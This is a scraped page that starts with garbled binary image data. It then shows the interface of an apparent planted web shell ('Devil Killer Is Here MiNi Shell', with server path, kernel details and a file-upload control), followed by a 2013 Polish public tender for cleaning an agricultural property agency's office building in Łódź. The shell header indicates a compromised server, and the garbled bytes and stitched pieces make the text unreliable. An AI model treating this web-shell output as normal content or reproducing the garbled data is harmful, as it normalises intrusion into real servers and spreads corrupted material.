JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131202/494570-N-2013.html

<p class="kh_header"><b>Łódź: Wykonanie usługi polegającej na sprzątaniu powierzchni wewnętrznych w budynku biurowym Agencji  Nieruchomości  Rolnych  położonym w Łodzi przy ul. Północnej 27/29 oraz na utrzymaniu porządku na terenie zewnętrznym w sąsiedztwie przedmiotowego budynku</b><br>
<b>Numer ogłoszenia: 494570 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi , ul. Północna 27/29, 91-420 Łódź, woj. łódzkie, tel. 042 636 53 26, faks 042 632 9133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi polegającej na sprzątaniu powierzchni wewnętrznych w budynku biurowym Agencji  Nieruchomości  Rolnych  położonym w Łodzi przy ul. Północnej 27/29 oraz na utrzymaniu porządku na terenie zewnętrznym w sąsiedztwie przedmiotowego budynku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa  sprzątania  wewnętrznych  powierzchni  w  budynku  biurowym  Agencji  Nieruchomości  Rolnych  w  Łodzi  dotyczy: 1 704,35 [m2] powierzchni podłóg łącznie oraz pozostałych powierzchni:okna i drzwi 295,23 [m2] i powierzchni zewnętrznej 1138 [m2] w tym:
Teren wzdłuż budynku od ul. Solnej i Północnej	328,00	- chodnik,	Teren parkingu wewnętrznego	700,00	- asfalt,	
Garaże nr 1-5	110	- terakota	
Szczegółowy zakres zamówienia określony został w załączniku nr 7 do SIWZ pn.: Opis przedmiotu zamówienia:
Pozostałe powierzchnie [m2]
A.	ZAKRES SPRZĄTANIA:
Zakres 1.	POMIESZCZENIA BIUROWE - czynności od a) do j):
a)	wycieranie na sucho i na mokro oraz usuwanie plam z mebli biurowych (również szaf na górze)i sprzętu biurowego, właściwymi do rodzaju sprzątanej powierzchni środkami pielęgnacyjnymi;
b)	odkurzanie tapicerki meblowej, dezynfekcja  aparatów  telefonicznych;
c)	wycieranie na mokro drzwi i ościeżnic wraz z klamkami z obu stron;
d)	mycie luster środkiem przeznaczonym do mycia luster;
e)	odkurzanie na sucho wykładzin dywanowych;
f)	w pomieszczeniach z parkietem (314, 315, 316) odkurzanie oraz mycie podłóg odpowiednim środkiem przeznaczonym do mycia parkietów;
g)	wycieranie na mokro parapetów, kaloryferów, listew przypodłogowych.
h)	opróżnianie i mycie koszy na śmieci oraz wymiana worków na śmieci;
i)	opróżnianie niszczarek;
j)	sprzątanie sali nr 326 i 214 oraz pomieszczeń archiwalnych, czyszczenie  ścian  z  zabrudzeń,  usuwanie  skutków  nieprzewidzianych  sytuacji

Zakres 2. 	KORYTARZE (hole, klatki schodowe, portiernia, piwnica, winda) - czynności od a do i:
a)	przecieranie na sucho i na morko mebli znajdujących się na korytarzach właściwymi do rodzaju sprzątanej powierzchni środkami;
b)	wycieranie na mokro parapetów, kaloryferów, gaśnic, tabliczek informacji wizualnej, listew przypodłogowych i listew instalacyjnych, oraz dźwigu dla niepełnosprawnych;
c)	zamiatanie i mycie powierzchni podłogowych, schodów, podestów, spoczników, podłogi windy; 
d)	mycie barierek, poręczy oraz kabiny windy właściwymi środkami do rodzaju czyszczonej powierzchni;
e)	mycie środkami pielęgnacyjnymi przeznaczonymi do mycia szyb powierzchni szklanych znajdujących się wewnątrz budynku (drzwi zewnętrzne, winda, drzwi wejściowe do poszczególnych korytarzy, gabloty);
f)	utrzymanie w czystości wycieraczek oraz powierzchni pod wycieraczkami znajdującymi się 
na korytarzach;
g)	opróżnianie, mycie  koszy  na  śmieci,  wymiana  worków  foliowych  na  śmieci;
h)	mycie  i  czyszczenie  opraw  lamp  i  innych  dostępnych  punktów  świetlnych  oświetlenia  ogólnego,
i)	czyszczenie  ścian  z  zabrudzeń,  usuwanie  skutków  nieprzewidzianych  sytuacji. 

Zakres 3. 	SANITARIATY - czynności od a) do i):
a)	mycie glazury; 
b)	mycie podłóg, umywalek, baterii umywalkowych środkami przeznaczonymi do czyszczenia 
i dezynfekcji;
c)	czyszczenie sedesów i desek sedesowych środkami przeznaczonymi do czyszczenia muszli toaletowych, mycie luster;
d)	mycie kloszy oświetleniowych nad umywalkami;
e)	wycieranie na mokro drzwi, klamek, parapetów, rur, kaloryferów środkami właściwymi do rodzaju sprzątanej powierzchni;
f)	opróżnianie i mycie pojemników na środki higieny osobistej, koszy na odpadki, koszy na zużyte ręczniki jednorazowe oraz wymiana worków na śmieci;
g)	zalewanie wodą kratki odpływowej we wszystkich toaletach;
h)	uzupełnianie  papieru  toaletowego,  ręczników  papierowych,  mydła,  i  środków  zapachowych;
i)	usuwanie  skutków  nieprzewidzianych  sytuacji.

Zakres 4.	POMIESZCZENIE SOCJALNE - czynności od a) do h):
a)	odkurzanie i mycie podłogi;
b)	wycieranie na mokro parapetów, kaloryferów, listew przypodłogowych;
c)	mycie zlewozmywaka oraz baterii odpowiednimi środkami;
d)	wycieranie na mokro blatów oraz mebli;
e) 	opróżnianie i mycie kosza na odpadki oraz wymiana worka na śmieci;
f)	odmrażanie i mycie lodówki;
g)	uzupełnianie ręcznika papierowego oraz płynu do mycia naczyń;
h)	czyszczenie  ścian  z  zabrudzeń,  usuwanie  skutków  nieprzewidzianych  sytuacji.

Zakres 5.	OKNA - czynności od a) do d):
a)	mycie  okien  w  holach  komunikacyjnych  oraz  klatkach  schodowych  (łącznie  20 szt.);
b)	mycie  okien  w  pokojach  biurowych  na  III-im  i  na  II-im  piętrze,  w  portierni  oraz  okienka  w  piwnicy,  w  pomieszczeniu  maszynowni  windy  (37 szt.),
c)	mycie  niskich  okien  jednoskrzydłowych  w  pomieszczeniach  archiwum  na  IV-ym  piętrze oraz  w  klatce  schodowej  ewakuacyjnej  (łącznie  25 szt.),
d)	mycie  wąskich  okien  jednoskrzydłowych  w  łazienkach  na  parterze,  na  I-ym,  II-im,  III-im  piętrze  (6 szt.).

Zakres 6.	TEREN ZEWNĘTRZNY - czynności od a) do d):
a)	zamiatanie  powierzchni  utwardzonych,  usuwanie  liści, opróżnianie popielniczek;
b)	w okresie jesienno-zimowym (styczeń-kwiecień oraz październik-grudzień) usuwanie śniegu  i posypywanie  powierzchni  chodników  wokół  posesji  piaskiem  (lub  solą),  również  w  dni  wolne  od  pracy  (soboty,  niedziele  i  święta);  
c)	ewentualne,  dodatkowe  wywożenie  śniegu  z  terenu  parkingu  (w  przypadku  znacznych  opadów  śniegu);
d)	czyszczenie mechaniczne podłóg w garażach.

	
HARMONOGRAM  
wykonywania czynności w poszczególnych zakresach sprzątania zawarty został w załączniku nr 7 do SIWZ - Opis przedmiotu zamówienia.


B.	Wymagania Zamawiającego dotyczące wykonywanej usługi:
1.	Należy używać odpowiednich środków przeznaczonych do czyszczenia/zmywania danego rodzaju powierzchni oraz stosować środki posiadające odpowiednie atesty.
	
2.	Zamawiający zastrzega sobie prawo do kontroli środków używanych do wykonania usługi; 
w przypadku używania niewłaściwych Wykonawca poniesie ewentualne koszty naprawienia szkód spowodowanych użyciem niewłaściwych środków czystości oraz zobowiązany jest do niezwłocznej zmiany używanego środka na odpowiedni do czyszczonej/zmywanej powierzchni.

3.	Wykonawca zobowiązany jest na swój koszt zapewnić osobom sprzątającym sprzęt konieczny do realizacji zamówienia oraz środki czystości. 

4.	Wykonawca zobowiązany jest do zakupu i bieżącego uzupełniania papieru toaletowego, mydła w płynie i w piance, środków zapachowych i dezynfekujących (odświeżacze powietrza w aerozolu oraz kostki zapachowe do muszli klozetowych) w sposób zapewniający ciągłość zaopatrzenia. 
	Przez ciągłość zaopatrzenia Zamawiający rozumie brak sytuacji, w której występuje niedobór w/w środków w godzinach pracy Zamawiającego.
	
5.	Wykonawca jest zobowiązany zapewnić środki czystości i higieny określonej jakości: 
papier toaletowy biały, dwuwarstwowy, gofrowany miękki papier ręcznikowy biały, jednowarstwowy, gofrowany do pojemników na ręczniki, mydło w płynie i w piance, kostki toaletowe o działaniu przeciwbakteryjnym. 
	Zamawiający informuje, że w sanitariatach zainstalowane są niżej wymienione pojemniki: 
-	2 pojemniki Merida Top Mini (na ręczniki pojedyncze ok. 250 szt.) o wymiarach 
28cm szer./26,5cm wys./14,5cm gł.; 4 pojemniki na papier toaletowy Merida Top Mini 
o wymiarach 22cm szer./27,5cm wys./14,5cm gł.; 2 pojemniki na mydło w pianie Merida Top - łazienki II p;
	-	3 pojemniki metalowe (na ręczniki pojedyncze) o wymiarach 28cm szer./26cm wys./10cm gł.;8 pojemników metalowych na papier toaletowy o średnicy 25cm na duże rolki papieru toaletowego; 3 dozowniki na mydło w płynie - łazienki III p. i parter;
-	4 pojemniki na ręczniki w rolach, o wymiarach 20cm szer./26cm wys./23cm gł. oraz pomieszczenie socjalne III p.), 4 pojemniki na papier toaletowy o standardowym wymiarze, 
3 pojemniki na mydło w płynie - łazienki I i IV p.
	
5.	Technika  mycia okien  powinna  być  dostosowana  do  rodzaju  okna,  w  głównej  klatce  schodowej  konieczne  zabezpieczenie  uprzężą  ochronną.

6.	Podczas mycia kabiny windy zabrania się opierania drabiny o szyby stanowiące  zewnętrzną  obudowę  szybu  windowego.

7.	Sprzątanie budynku powinno odbywać się po zakończeniu pracy przez Zamawiającego tzn. 
od godziny 15:30.

8.	Osoby sprzątające pomieszczenia biurowe zobowiązane są przy pobieraniu kluczy od sprzątanych pomieszczeń oraz ich zdawaniu, do wpisywania się do książki w portierni z zaznaczeniem godziny ich pobierania i zdania.

9.	Podczas pracy każda z osób sprzątających pomieszczenia biurowe otwiera tylko to pomieszczenie, które aktualnie sprząta. Drzwi pozostałych pomieszczeń powinny być w tym czasie zamknięte na klucz.

10.	Po zakończeniu pracy w danym pokoju, każda osoba sprzątająca zobowiązana jest do sprawdzenie zamknięcia okien oraz zgaszenia świateł.

11.	Sprzątanie w pokojach nr 313  i 331 (III p.)  oraz we wszystkich pomieszczeniach archiwum na IV piętrze musi być wykonywane w tylko w obecności uprawnionych pracowników Zamawiającego, w godzinach pracy Zamawiającego tj. do godziny 15:30.

12.	Odśnieżanie  powierzchni  parkingu wewnętrznego  można  wykonywać  jedynie przy  zastosowaniu  małogabarytowych  traktorów  z  lemieszem,  ze  względu  na  ograniczone  wymiary  bramy  wjazdowej,  lub  ręcznie.  Dopuszczalne  są  urządzenia  mechaniczne,  stosowane  do  odśnieżania,  o  mocy  do  15 kW,  ze  względu  na  konieczność  ograniczenia  poziomu  hałasu  podczas  prac  w  godzinach  nocnych.  Oczyszczanie  powierzchni  parkingu z  zalegającego  śniegu  należy  wykonywać  do  godz. 7:00  lub  po  godz. 15:30.

Kontrola czystości budynku będzie prowadzona przez pracowników Zamawiającego. Z czynności tej sporządzony będzie protokół, który zostanie przekazany Wykonawcy. Przy drugim negatywnym protokole zawierającym ewentualne usterki i nieprawidłowości Zamawiający w stosunku do Wykonawcy będzie naliczał kary umowne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.61.00.00-6, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości 3 000,00 zł (słownie: trzy tysiące złotych, zero groszy)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie, oprócz oświadczenia w trybie art. 22 ust. 1 uPzp Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.	Na potwierdzenie, że Wykonawca posiada niezbędną wiedzę i doświadczenie, Wykonawca zobowiązany jest załączyć do oferty:
a)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
 Celem wykazania spełniania powyższego warunku, wymagane jest wykazanie minimalnego doświadczenia w postaci wykonania co najmniej 2 usług tożsamych z przedmiotem zamówienia tj. związanych ze sprzątaniem powierzchni wewnętrznych i zewnętrznych obiektów administracji rządowej, samorządowej lub obiektów wielofunkcyjnych (biurowo-handlowych) trwających nie krócej niż 12 miesięcy i wartości umowy co najmniej 100 000 zł - wzór stanowi załącznik nr 6 do SIWZ
b)	dowody potwierdzające bezspornie, że usługi na których zrealizowanie Wykonawca powołuje się w powyżej zostały wykonane lub są wykonywane należycie. 
Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.	Na potwierdzenie, że Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty:
a)	w zakresie dysponowania potencjałem technicznym, Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty oświadczenie że:
- dysponuje lub będzie dysponował przynajmniej 4 osobami zdolnymi do wykonywania prac porządkowych w pełnym zakresie obowiązków określonych przez Zamawiającego w SIWZ, w tym, że minimum 3 osobami  jednocześnie świadczącymi usługi sprzątania budynku - w ramach zakresów 1, 2, 3 i 4 określonych przez zamawiającego w załączniku nr 1 do umowy oraz, że wszystkie osoby przewidziane do wykonywania usługi sprzątania posiadają aktualne zaświadczenia o niekaralności wydane przez KRK - Wzór stanowi załącznik nr 4 do SIWZ.
Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia - Wykonawca winien załączyć do oferty:
a)	ważną i opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000,00 zł. 
Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty musi być załączone pełnomocnictwo, o ile prawo do podpisania umowy nie wynika z innych dokumentów złożonych wraz z ofertą. Przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba, że z treści pełnomocnictwa wynika co innego. Pełnomocnictwo składa się w oryginale lub kopii poświadczonej za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści zawartej umowy w zakresie jej realizacji pod warunkiem, że:
a)	wystąpią czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwalają na prawidłowe i terminowe wykonanie zamówienia (siła wyższa)</p>
